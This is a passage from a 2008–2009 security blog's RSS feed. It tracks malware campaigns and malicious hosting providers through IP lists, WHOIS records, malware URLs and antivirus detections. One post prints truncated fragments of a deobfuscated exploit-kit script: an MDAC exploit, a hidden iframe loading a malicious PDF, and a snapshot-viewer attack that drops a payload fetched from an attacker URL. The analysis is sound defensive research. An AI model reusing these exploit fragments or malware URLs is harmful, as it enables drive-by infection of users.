hxxp://gay24&#215;02.hpg.ig.com.br/nl5.html<br />
hxxp://gay24&#215;02.hpg.ig.com.br/nl6.html<br />
hxxp://gay24&#215;02.hpg.ig.com.br/nl7.html</p>
<p>So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.</p>
<p>As for where this attack came from, it was delivered via SPAM with a subject line of &#8220;fotos [date]&#8221; and is written in Portuguese. The text reads &#8220;These photos are very funny&#8221;.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/fotos-malware.jpg"><img class="alignnone size-medium wp-image-346" title="Portuguese SPAM with malware" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/fotos-malware-300x195.jpg" alt="Portuguese SPAM with malware" width="300" height="195" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/02/one-click-hosting-spreads-banking-trojan/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Finding the Unknown &#8211; Detecting Emailed Malware Waves</title>
		<link>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/</link>
		<comments>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 02:34:59 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[instrusion detection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[wsnpoem]]></category>
		<category><![CDATA[zbot]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=338</guid>
		<description><![CDATA[In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.
Another method I&#8217;d like to highlight is looking for [...]]]></description>
			<content:encoded><![CDATA[<p>In a <a href="http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/" target="_blank">previous post</a> I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.</p>
<p>Another method I&#8217;d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.</p>
<p>Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.</p>
<p>There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was &#8220;djellow.zip&#8221;.  A quick search leads us to <a title="Abuse.ch - Zeus" href="http://www.abuse.ch/?p=1576" target="_blank">this article</a> over at abuse.ch.</p>
<p>The messages were sent from a number of IPs, including:</p>
<p>95.25.108.154<br />
95.24.3.119<br />
89.248.207.69<br />
88.227.199.86<br />
86.105.126.142<br />
85.100.177.112<br />
84.92.85.139<br />
84.204.112.15<br />
84.104.97.35<br />
83.5.144.32<br />
78.176.8.64<br />
78.166.216.115<br />
78.161.81.160<br />
78.158.51.103<br />
77.77.15.208<br />
77.255.254.214<br />
76.175.144.40<br />
72.179.5.10<br />
71.124.158.42<br />
209.239.38.24<br />
201.22.7.148<br />
201.15.77.229<br />
201.0.136.67<br />
200.68.63.226<br />
200.56.79.179<br />
190.175.133.38<br />
189.78.200.43<br />
188.47.4.252<br />
187.14.9.68</p>
<p>The two worst offenders are Brazil and Turkey with 5 IPs each.</p>
<table style="border-collapse: collapse; height: 92px;" border="0" cellspacing="2" cellpadding="2" width="808">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">ASN</p>
<p>18881</td>
<td style="width: 85pt;" width="113">IP</p>
<p>201.22.7.148<span> </span></td>
<td style="width: 95pt;" width="126">Prefix</p>
<p>201.22.0.0/18<span> </span></td>
<td style="width: 48pt;" width="64">Country</p>
<p>BR<span> </span></td>
<td style="width: 346pt;" width="461">Description</p>
<p>Global Village Telecom</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">8167</td>
<td><span> </span>201.15.77.229<span> </span></td>
<td><span> </span>201.15.64.0/18<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELESC &#8211; Telecomunicacoes de Santa   Catarina SA</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>201.0.136.67<span> </span></td>
<td><span> </span>201.0.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>189.78.200.43<span> </span></td>
<td><span> </span>189.78.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">7738</td>
<td><span> </span>187.14.9.68<span> </span></td>
<td><span> </span>187.14.0.0/19<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>Telecomunicacoes da Bahia S.A.</td>
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; width: 606pt;" border="0" cellspacing="2" cellpadding="2" width="806">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">9121</td>
<td style="width: 85pt;" width="113"><span> </span>88.227.199.86<span> </span></td>
<td style="width: 95pt;" width="126"><span> </span>88.227.128.0/17<span> </span></td>
<td style="width: 48pt;" width="64"><span> </span>TR<span> </span></td>
<td style="width: 346pt;" width="461"><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>85.100.177.112<span> </span></td>
<td><span> </span>85.100.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.176.8.64<span> </span></td>
<td><span> </span>78.176.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.166.216.115<span> </span></td>
<td><span> </span>78.166.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.161.81.160<span> </span></td>
<td><span> </span>78.161.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
</tbody>
</table>
<p>Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that&#8217;s needed is a detective hat and knowledge of current threats.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; Still Trade LTD</title>
		<link>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/</link>
		<comments>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/#comments</comments>
		<pubDate>Mon, 22 Dec 2008 18:39:13 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=191</guid>
		<description><![CDATA[The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.
person:   [...]]]></description>
			<content:encoded><![CDATA[<p>The absolute worst culprit that I&#8217;ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL66769" target="_blank">here</a>.</p>
<p>person:         Perevitskiy Sergey<br />
address:        Russian Federation,<br />
address:        St. Petersburg, Fedosenko st, 30 liter A, 24-N<br />
mnt-by:         STILLTRADE-MNT<br />
abuse-mailbox:  abuse@still-trade.com<br />
e-mail:         perevitzky.sergey@still-trade.com<br />
phone:          +7 (960) 257-87-90<br />
nic-hdl:        PERE1-RIPE<br />
changed:        lexa@wahome.ru 20080624<br />
source:         RIPE</p>
<p>Still Trade hosts a ton of fake/rogue anti virus domains and applications. We&#8217;ve seen these hosts pop up recently:</p>
<p><strong>91.208.0.220</strong><br />
2008-12-01<br />
scanner.rapidantivirus.com	/setup/setup.exe &#8211; Fake AV</p>
<p><a href="http://www.virustotal.com/analisis/ddaaa11019e101b0cec97868feb4f63a" target="_blank">Trojan:Win32/FakePowav<br />
FraudTool.Win32.ExtraAntivir.c<br />
Win32/FakeAV!generic</a></p>
<p><strong>91.208.0.221</strong><br />
2008-12-11<br />
myprivatetubes09.net	/cd/650/1749/wmpcdcs.exe &#8211; Zlob</p>
<p><a href="http://www.virustotal.com/analisis/70a709dd1196f15b3d6db1a6edd1c2c8" target="_blank">DR/Zlob.Gen<br />
TrojanDownloader:Win32/Renos.HB<br />
Mal/Emogen-G<br />
</a></p>
<p><strong>91.208.0.253</strong><br />
2008-12-03<br />
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe &#8211; Zlob</p>
<p>Same as above</p>
<p>The following IPs are associated with malicious applications:</p>
<p>91.208.0.220<br />
91.208.0.221<br />
91.208.0.223<br />
91.208.0.224<br />
91.208.0.225<br />
91.208.0.228<br />
91.208.0.229<br />
91.208.0.230<br />
91.208.0.231<br />
91.208.0.234<br />
91.208.0.235<br />
91.208.0.236<br />
91.208.0.237<br />
91.208.0.238<br />
91.208.0.239<br />
91.208.0.240<br />
91.208.0.241<br />
91.208.0.242<br />
91.208.0.243<br />
91.208.0.244<br />
91.208.0.245<br />
91.208.0.246<br />
91.208.0.247<br />
91.208.0.248<br />
91.208.0.249<br />
91.208.0.250<br />
91.208.0.251<br />
91.208.0.252<br />
91.208.0.253<br />
91.208.0.254</p>
<p>BISS also has a <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&amp;st=90&amp;p=88153&amp;#entry88153" target="_blank">comprehensive list of domains and malware</a> being served by these guys.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/22/sources-of-badness-still-trade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; Starline Web Services</title>
		<link>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/</link>
		<comments>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/#comments</comments>
		<pubDate>Wed, 17 Dec 2008 21:50:56 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=177</guid>
		<description><![CDATA[Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&#38;C as reported by Fireeye.
inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web [...]]]></description>
			<content:encoded><![CDATA[<p>Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for <a href="http://tech.yahoo.com/news/pcworld/20081127/tc_pcworld/estonianispcutsoffcontrolserversforsrizbibotnet" target="_blank">briefly hosting a Srizbi C&amp;C</a> as reported by <a href="http://blog.fireeye.com/research/2008/11/pushdocutwail-control-servers.html" target="_blank">Fireeye.</a></p>
<pre>inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE</pre>
<p>The Yahoo article has lots of great information on the relationship between Starline and it&#8217;s upstream providers, so I won&#8217;t delve into that here.</p>
<p>Here are the hits I&#8217;ve seen from their IP space:</p>
<p>92.62.100.0 &#8211; 92.62.101.255</p>
<p><strong>92.62.100.68</strong><br />
2008-11-05<br />
plotfive.cn	/load.php</p>
<p>2008-11-12	 	/cache/doc.pdf</p>
<p>2008-11-22		/cache/doc.pdf</p>
<p><strong>92.62.101.13 </strong><br />
2008-10-24<br />
tgspk.cn	/zpl/pdf.php</p>
<p><strong>92.62.101.53</strong><br />
2008-10-30<br />
blufda.com	/eez3a893/spl/pdf.pdf</p>
<p>2008-11-26 		/u8899r5v/spl/pdf.pdf<br />
/u8899r5v/exe.php</p>
<p>2008-12-17<br />
kraspa.com	/yg6cv7ar/spl/pdf.pdf</p>
<p><strong>92.62.100.44</strong><br />
2008-09-18<br />
92.62.100.44	/1/<br />
/2/<br />
<strong>92.62.100.43</strong><br />
2008-09-17<br />
92.62.100.43	/1/<br />
/2/</p>
<p>There&#8217;s quite a history here. From the looks of things, someone has been<br />
moving around their malware from domain to domain on 92.62.101.53. All<br />
of these sites are down as of this writing except kraspa.com. Lets dive<br />
further into this site.</p>
<p>The first page I saw was kraspa.com	/yg6cv7ar/spl/pdf.pdf however<br />
this is not the whole story. When investigating that exact URL, pdf.pdf<br />
is not found. This is curious as I saw the site earlier today. Backing up<br />
to the root of kraspa.com, we get an index page. The index page contains<br />
an iframe that points to a different directory. The malware author must<br />
have coded his site to rotate directory names based on a certain criteria.<br />
This makes investigation difficult if you can&#8217;t figure out where it will<br />
send victims to next.</p>
<p>The next iframe I got contained:</p>
<p>src=&#8221;/ov9632l9/index.php&#8221;</p>
<p>The next page that comes into play is the exploit script index.php which<br />
is detected as:</p>
<p><a href="http://www.virustotal.com/analisis/faab63a5b6f386690821ea5304aa36ab" target="_blank">Trojan-Downloader.JS.Psyme.alv</a></p>
<p>Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and<br />
the Microsoft Access Snapshot viewer. Here&#8217;s some of the script:</p>
<p><em> var p_url = &#8220;http://kraspa.com/ov9632l9/ztt.php&#8221;;<br />
function MDAC(){<br />
</em></p>
<p><em> var nuc=&#8221;;<br />
d8= 0;<br />
var koSZV = document.createElement(&#8221;o&#8221;+nuc+&#8221;b&#8221;+nuc+&#8221;je&#8221;+nuc+&#8221;c&#8221;+nuc+&#8221;t&#8221;);<br />
koSZV.setAttribute(&#8221;id&#8221;,&#8221;&lt;&#8221;+nuc+&#8221;?=k&#8221;+nuc+&#8221;o&#8221;+nuc+&#8221;S&#8221;+nuc+&#8221;ZV?&#8221;+nuc+&#8221;&gt;&#8221;);<br />
[....]<br />
function PDF()<br />
{<br />
document.write(&#8217;&lt;iframe src=&#8221;spl/pdf.pdf&#8221; width=1 height=1 style=&#8221;display:none&#8221;&gt;&lt;/iframe&gt;&#8217;);<br />
[....]<br />
function SS()<br />
{<br />
var arbitrary_file = p_url;<br />
var dest = &#8216;C:/AUTOEXEC.BAT&#8217;;<br />
document.write(&#8221;&lt;object classid=&#8217;clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9&#8242; id=&#8217;attack&#8217;&gt;&lt;/object&gt;&#8221;);<br />
[....]<br />
if (MDAC()||PDF()||SS()) { }</em><br />
Detections for the malicious pdf:</p>
<p><a href="http://www.virustotal.com/analisis/1515251991187a70685a8ffd1f118cfb" target="_blank">JS:Agent-BQ<br />
Exploit.RealPlr.K</a></p>
<p>The payload is a file called ztt.php, here are a few of the detections:</p>
<p><a href="http://www.virustotal.com/analisis/49fcad6c673077efcd345f12f03424ff" target="_blank">Trojan.Win32.Delf.gpg<br />
Troj/Dloadr-BZT<br />
Trojan.Win32.Delf.fyl</a></p>
<p>A quick submission to Threat Expert (<a href="http://www.threatexpert.com/report.aspx?md5=0faec8b68a1840a3221fecc04f919a7c" target="_blank">report</a>) and Anubis (<a href="http://anubis.iseclab.org/?action=result&amp;task_id=1d7454d6dc3c49254352eaeacc44a4465&amp;format=html" target="_blank">report</a>) reveal<br />
further binaries that are downloaded. The .dat files are not exes, but a<br />
type of binary data file.</p>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1033                                     to 92.62.101.53:80 &#8211; [kraspa.com] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/zro.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/mp.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell">Request: GET /flo/3rkour.dat</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Of particular interest is 79.143.177.43, another Latvian host with a<br />
small /24 network. Might be worth keeping your eyes open for them too.</p>
<pre>inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT</pre>
<table style="background-color:#d0d8e4;" border="0" cellspacing="0" cellpadding="2" width="100%">
<tbody>
<tr>
<td class="TableCell" colspan="2"><strong>From ANUBIS:1036                                     to 79.143.177.43:80 &#8211; [79.143.177.43] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /myfiles/95/139/file.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
<tr>
<td class="TableCell" colspan="2"><strong> From ANUBIS:1037                                     to 210.83.85.100:80 &#8211; [orzsys.cc] </strong></td>
</tr>
<tr>
<td class="TableCell">Request: GET /files/20026.exe</td>
</tr>
<tr>
<td class="TableCell">Response: 200 &#8220;OK&#8221;</td>
</tr>
</tbody>
</table>
<p>Some detections for 20026.exe, and file.exe:</p>
<p><a href="http://www.virustotal.com/analisis/66971c2f64d6162f8270fba7635e7906" target="_blank">BDS/Hupigon.Gen<br />
Trojan.FakeAlert.Gen!Pac.2</a></p>
<p><a href="http://www.virustotal.com/analisis/07453d142befa44fcbb1fabaaf127a46" target="_blank">Trojan.Crypt.LooksLike.XPACK<br />
Trojan.FakeAlert.Gen!Pac.2</a></p>
<p>The FakeAlert signatures are correct, the threat ultimatly installs some<br />
fake anti virus / anti spyware application.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2008/12/spyware-big.jpg" target="_blank"><img class="alignnone size-full wp-image-180" title="small" src="http://www.martinsecurity.net/wp-content/uploads/2008/12/small.jpg" alt="small" width="443" height="354" /></a></pre>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/17/sources-of-badness-starline-web-services/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; PortNAP</title>
		<link>http://www.martinsecurity.net/2008/12/16/sources-of-badness-portnap/</link>
		<comments>http://www.martinsecurity.net/2008/12/16/sources-of-badness-portnap/#comments</comments>
		<pubDate>Tue, 16 Dec 2008 15:05:27 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=172</guid>
		<description><![CDATA[One of the smaller hosts I&#8217;ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We&#8217;ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 &#8211; 84.243.197.255.

inetnum:        84.243.197.0 - 84.243.197.255
netname:   [...]]]></description>
			<content:encoded><![CDATA[<p>One of the smaller hosts I&#8217;ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We&#8217;ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 &#8211; 84.243.197.255.</p>
<pre>
inetnum:        84.243.197.0 - 84.243.197.255
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed:        noc@grafix.nl 20081021
source:         RIPE
abuse-mailbox:  abuse@grafix.nl
</pre>
<p>
<strong>84.243.196.136	</strong>2008-12-02 &#8211; site down<br />
pro-scanner-online.com	/2009/download/trial/A9installer_880473.exe</p>
<p><strong>84.243.196.137</strong>	2008-12-02 &#8211; site down<br />
protected-downloads.com	/download/trial/AV360Install_77014205.exe<br />
<strong><br />
84.243.197.183</strong>	2008-11-20 &#8211; site down<br />
protection-livescan.com	/2009/download/trial/A9installer_880290.exe</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/16/sources-of-badness-portnap/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; ZlKon</title>
		<link>http://www.martinsecurity.net/2008/12/15/sources-of-badness-zlkon/</link>
		<comments>http://www.martinsecurity.net/2008/12/15/sources-of-badness-zlkon/#comments</comments>
		<pubDate>Mon, 15 Dec 2008 17:27:30 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[renos]]></category>
		<category><![CDATA[zlkon]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=160</guid>
		<description><![CDATA[After a weekend hiatus, I&#8217;m back with the next host of interest &#8211; ZlKon.
role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:   [...]]]></description>
			<content:encoded><![CDATA[<p>After a weekend hiatus, I&#8217;m back with the next host of interest &#8211; ZlKon.</p>
<pre>role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
e-mail:         hostmaster@zlkon.lv
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed:        hostmaster@zlkon.lv 20081125
source:         RIPE
abuse-mailbox:  abuse@zlkon.lv</pre>
<p>Based in Latvia, Zlkon seems to have a high ratio of bad IPs to it&#8217;s small<br />
address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon<br />
has two /24s 94.247.2.0 &#8211; 94.247.3.255.</p>
<pre>% Information related to '94.247.0.0/21AS12553'

route:          94.247.0.0/21
descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed:        igors@pcexpress.lv 20081121
source:         RIPE</pre>
<p><strong>94.247.2.11</strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com /2009/download/trial/A9installer_880135.exe</p>
<p><strong>94.247.2.183</strong><br />
2008-12-09<br />
fire-movie.com 	/download/Keygen.Image.for.DOS.2.08c3098.exe<br />
<a href="http://www.virustotal.com/analisis/f6933782ad9f255bf135068ab7e80541" target="_blank">Win32:Fabot<br />
Trojan:Win32/Alureon.gen!J<br />
Worm/AutoRun.ER</a></p>
<p>2008-12-02<br />
spacekeys.net	/download/windows311megaupload_3019.exe<br />
Same as fire-movie.net above</p>
<p>2008-12-12<br />
moonmovie.net	/download/moonmovie.v.3.484.exe<br />
Same as fire-movie.net above</p>
<p><strong>94.247.2.215 </strong><br />
2008-11-27 &#8211; not accessible<br />
antivirus&#8211;plus.com /installer_00004.exe</p>
<p><strong>94.247.2.222 </strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com/2009/download/trial/A9installer_880147.exe</p>
<p><strong>94.247.3.228</strong><br />
2008-12-02 &#8211; not accessible<br />
pro-scanner-online.com/2009/download/trial/A9installer_880473.exe</p>
<p>2008-12-12<br />
get-frsh-files.com       /MCLiteodecVer.6.20467.exe<br />
Same as files-upload.21.com below</p>
<p>2008-12-13<br />
files-upload-21.com	/MCLiteodecVer.6.20271.exe<br />
<a href="http://www.virustotal.com/analisis/f8dc8efc3e085aa44630ac361197e1b5" target="_blank">TrojanDownloader:Win32/Renos.FH</a></p>
<p><strong>94.247.2.231</strong><br />
2008-12-03 &#8211; not accessible<br />
pro-scanner-online.com	/2009/download/trial/A9installer_880147.exe</p>
<p><strong>94.247.3.232</strong><br />
2008-12-14<br />
codecdownload.3d-softwareportal.com	/exclusivemovie.1518.exe<br />
<a href="http://www.virustotal.com/analisis/f926b5759d120a973f6451506634c0f1" target="_blank">TrojanDownloader:Win32/Renos.FU<br />
Trojan.Win32.Undef.uhx</a></p>
<p>So we&#8217;ve got some fake antivirus, Renos, zlob, etc. Nothing overly terrible like a banking trojan or spam bot but who knows what else is being hosted in Zlkon&#8217;s address space.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/12/15/sources-of-badness-zlkon/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Sources of Badness &#8211; UATelecom</title>
		<link>http://www.martinsecurity.net/2008/12/12/sources-of-badness-uatelecom/</link>
		<comments>http://www.martinsecurity.net/2008/12/12/sources-of-badness-uatelecom/#comments</comments>
		<pubDate>Fri, 12 Dec 2008 18:28:39 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=151</guid>
		<description><![CDATA[The next source of badness I&#8217;ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German)
91.203.92.0/22
AS44997
netname:        BASTION-NET
descr:        [...]]]></description>
			<content:encoded><![CDATA[<p>The next source of badness I&#8217;ll cover is<strong> UATelecom (AS44997)</strong>. With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about <a href="http://www.abuse.ch/?p=483">here (written in German)</a></p>
<p>91.203.92.0/22<br />
AS44997</p>
<p>netname:        BASTION-NET<br />
descr:          ISP UATelecom<br />
country:        EU<br />
organisation:   ORG-TG39-RIPE<br />
org-name:       UATELECOM LLC.<br />
org-type:       OTHER<br />
address:        Ukraine, Voznesensk, Lenina 52<br />
remarks:        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
phone:          +38-048-701-05-45<br />
phone:          +38-096-380-13-21<br />
phone:          +38-096-380-13-26<br />
fax-no:         +38-048-701-05-45<br />
remarks:        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
e-mail:         ipadmin@uatelecom.com.ua<br />
abuse-mailbox:  abuse@uatelecom.com.ua</p>
<p>We&#8217;ve seen lots of malware from their netblock:</p>
<p><strong>91.203.92.138    2008-10-30 </strong> &#8211; site down<br />
91.203.92.138    /mix/xcvb.pdf</p>
<p><strong>91.203.92.47    2008-12-09 </strong> &#8211; site down<br />
advancedscanner.com    /2009/download/trial/InstallAVv_880460.exe</p>
<p><strong>91.203.93.25    2008-12-02</strong><br />
softwareformyvideo.com    /get/1xxx5912940/download.exe</p>
<p><a href="http://www.virustotal.com/analisis/0a03d64d760fb669ff7b0ac774183b1a">Trojan-Dropper.Win32.Agent.abiq<br />
TrojanDownloader:Win32/Renos.FS<br />
Troj/Zlob-AOX</a></p>
<p><strong>91.203.93.26    2008-12-02</strong><br />
91.203.93.26    /WinDefender2009.exe &#8211; fake AV</p>
<p><a href="http://www.virustotal.com/analisis/7d5518569772757323367de0c3db9671">FraudTool.Win32.WinDefender.g<br />
AntiVirus2008.AIJ</a></p>
<p><strong>91.203.93.29    2008-12-03</strong> (more on this below)<br />
easywebsiteauditor.ru    /spl/load.php &#8211; SPAM Bot</p>
